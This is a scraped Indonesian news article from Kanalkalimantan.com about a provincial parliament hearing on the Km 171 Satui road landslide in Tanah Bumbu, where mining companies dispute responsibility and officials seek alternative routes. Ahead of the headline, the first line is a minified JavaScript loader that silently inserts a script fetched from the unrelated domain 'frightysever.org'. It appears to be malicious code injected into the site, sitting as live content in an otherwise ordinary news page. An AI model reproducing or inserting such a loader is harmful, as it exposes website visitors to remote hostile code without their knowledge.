(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarmasin

Longsor Km 171 Satui, DPRD Kalsel Minta Semua Pihak Bantu Operasional Jalur Alternatif


KANALKALIMANTAN.COM, BANJARMASIN– Sengkarut penanganan jalan longsor di Km 171 Satui, Kabupaten Tanah Bumbu (Tanbu), menjadi perhatian DPRD Kalimantan Selatan (Kalsel). Berbagai pihak terkait masalah ini diundang dalam rapat dengar pendapat (RDP) oleh Komisi III, pada Selasa (25/10/2022).

Rapat yang juga dihadiri Ketua DPRD Kalsel Supian HK ini, melibatlan Balai Pelaksanaan Jalan Nasional (BPJN) Kalsel, Dinas Energi dan Sumber Daya (ESDM), Inspektur Tambang Kalsel, PT MJAB, dan PT Arutmin Indonesia. Hadir juga Lembaga Swadaya Masyarakat (LSM) Kaki Kaslel dan Forbes Kaslel.

Pimpinan rapat yang juga Ketua Komisi III DPRD Kalsel Hasanudin Murad mengatakan, saat ini masih menunggu hasil kajian dari BPJN terkait kelayakan tanah, untuk menentukan apakah jalan nasional tersebut dipindah atau tetap dipertahankan di titik longsor tersebut.

“Sementara hasil kajian, BPJN terus mengupayakan jalan yang ada saat ini untuk terus diperbaiki, sampai memungkinkan roda dua untuk melintas, serta jalan alternatif yang diupayakan Pemda Tanah Bumbu juga terus disiapkan,” ungkapnya.

 

Baca juga  : Sengkarut Penanganan Longsor Jalan Nasional KM 171 di Satui, Begini Penjelasan Bupati Zairullah

Dalam waktu dekat pihaknya akan segara berkordinasi dengan Kementerian terkait untuk mencari jalan keluar terkait permasalahan jalan nasional tersebut.

Dijadwalkan Jumat pekan depan, pihaknya bersama Dinas ESDM akan segara melakukan kordinasi dan mendesak kementerian terkait untuk meninjau langsung ke lokasi jalan yang longsor tersebut.

Sekretaris Komisi III H Abidinsyah menyarankan berbagai pihak terkait melakukan kolaborasi dalam membantu penyiapan jalur alternatif.  Baik oleh Balai Pelaksana Jalan Nasional (BPJN) Kalsel, Dinas Pekerjaan Umum dan Penataan Ruang (PUPR) serta pihak perusahaan tambang.

“Terputusnya jalur Satui membuat lalu lintas terganggu dan pada gilirannya mengganggu angkutan kebutuhan pokok masyarakat di wilayah timur Kalsel,” terangnya.

 

Baca juga  : Nyaris Masuk Longsor Jalan Nasional KM 171 Satui, Warga Ini Relakan Pekarangan Rumah Dilintasi Roda Dua

Terpisah, Wakil Ketua Komisi III Rosehan NB mengharapkan peran Balai Pelaksana Jalan Nasional (BPJN) untuk menginformasikan secara terbuka terkait perkembangan proses perbaikan jalan nasional tersebut kepada masyarakat.

“BPJN harus berperan aktif mengabarkan perkembangan terbaru dari aktivitas perbaikan jalan Satui tersebut, melalui media cetak atau elektronik terkhusus melalui media sosial resmi BPJN,” katanya.

“Agar masyarakat tidak resah menunggu informasi terkait permasalahan ini,” tutup Rosehan.

RDP berjalan cukup alot, dikarenakan kedua perusahaan tambang PT Arutmin Indonesia dan PT MJAB saling mengklaim pihaknya melakukan aktivitas tambang sudah sesuai prosedur dan ketentuan berlaku.

Perwakilan PT Arutmin Indonesia Cipto Prayitno saat rapat tersebut mengatakan, melakukan aktivas tambang berada jauh dari lokasi titik longsor.

 

Baca juga : Hitung Hari, Disporapar Balangan Pantau Kesiapan Kontingen Porprov

“Kami melakukan aktivitas pertambangan sekitar kurang lebih 750 meter ke arah utara dari lokasi terjadinya longsor saat ini,” katanya.

Meskipun demikian pihaknya mengatakan akan komitmen membantu dan berkoordinasi dengan pemerintah daerah Tanah Bumbu dalam pembangunan jalan alternatif untuk bisa dilewati pengendara.

Sebagaiman diketahui Jalan Kilometer 171 Satui, Tanah Bumbu mengalami longsor hingga hampir menghabiskan badan jalan. Ini kasus ketiga kalinya pada Minggu (16/10/2022) longsor kembali terjadi di tempat tersebut sehingga kendaraan roda 4 tidak dapat melewati jalan yang menghubungkan 2 kabupaten tersebut. (Kanalkalimantan.com/rizki)

Reporter : rizki
Editor : cell


Desy Arfianty

Recent Posts

Peringati Hari Buruh, PLN Tebar Kebaikan untuk Petugas Kebersihan Kebun Raya Banua

KANALKALIMANTAN.COM, BANJARBARU - PT PLN (Persero) Unit Induk Penyaluran dan Pusat Pengatur Beban (UIP3B) Kalimantan… Read More

3 jam ago

Jhonny Iskandar Meninggal Dunia, Ini Profil Pelantun “Bukan Pengemis Cinta”

KANALKALIMANTAN.COM - Penyanyi senior Jhonny Iskandar meninggal dunia hari ini, Jumat (10/5/2024). Eks personel Orkes… Read More

5 jam ago

TMMD di Desa Sungai Karias Bangun Ulang Rumah Tak Layak Huni

KANALKALIMANTAN.COM, AMUNTAI – Membangun ulang Rumah Tidak Layak Huni (RTLH) menjadi layak huni menjadi salah… Read More

5 jam ago

Lepas Atlet ke Popda Kalsel, Ini Kata Ketua DPRD Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Target juara umum kontingen Kota Banjarbaru dalam ajang Pekan Olahraga Pelajar Daerah… Read More

5 jam ago

Wagub Edy Pratowo Maju Pilkada Kalteng, Siap Dipasang Posisi Apapun

KANALKALIMANTAN.COM, PALANGKARAYA - Wakil Gubernur (Wagub) Kalimantan Tengah (Kalteng), Edy Pratowo, mengumumkan keputusannya untuk mendaftarkan… Read More

6 jam ago

Target Juara Umum Popda Kalsel 2024, Aditya Janji Beri Bonus Pribadi

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin melepas 109 atlet untuk berlaga dalam… Read More

6 jam ago

This website uses cookies.